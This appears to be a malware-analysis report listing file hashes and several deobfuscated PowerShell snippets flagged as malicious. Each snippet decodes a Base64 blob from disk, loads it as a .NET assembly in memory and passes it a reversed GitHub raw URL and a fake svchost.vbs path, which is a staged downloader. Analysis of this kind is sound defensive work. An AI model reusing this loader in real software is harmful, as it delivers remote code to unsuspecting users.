|
Hash | Hash Value |
|---|---|
| MD5 | 7c23e9fd391a6e1b4186cdd981523a38
|
| Sha1 | ff9d41310d9524a06fa752ba210a567f7ecd204d
|
| Sha256 | fa93ea4a6ce497c4f94ef8d50e451ff1ee81825319bfcf180eb003a61bec3568
|
| Sha384 | 818dde339ef21dbf0f56995d7d7a25dad8c04e36336002fed5cc5e3903a2d21b78914b2b73955bb1b944330ab4a58f09
|
| Sha512 | c686067db81068726ac8d718a5d84df987fa3393478d03da275892a88c87435b4c91b4ca4b0c9245b417384a165da06a9583fb78e1d9c9b56df660c194593f4b
|
| SSDeep | 24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5TN:A4oPtM7ktApDPwF5TN
|
| TLSH | 34218E10AAFC8E05B673DA0997BBE49015767AECDD35CB0CC354C10C16AE944D866F37
|
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca"))) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } ))) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } )) |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } )) |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca"))) Malicious |
7c23e9fd391a6e1b4186cdd981523a38 |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } ))) Malicious |
7c23e9fd391a6e1b4186cdd981523a38 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } )) Malicious |
7c23e9fd391a6e1b4186cdd981523a38 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\svchost.vbs", "____________________________________________-------", "0", "1", "caca") } )) Malicious |
7c23e9fd391a6e1b4186cdd981523a38 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |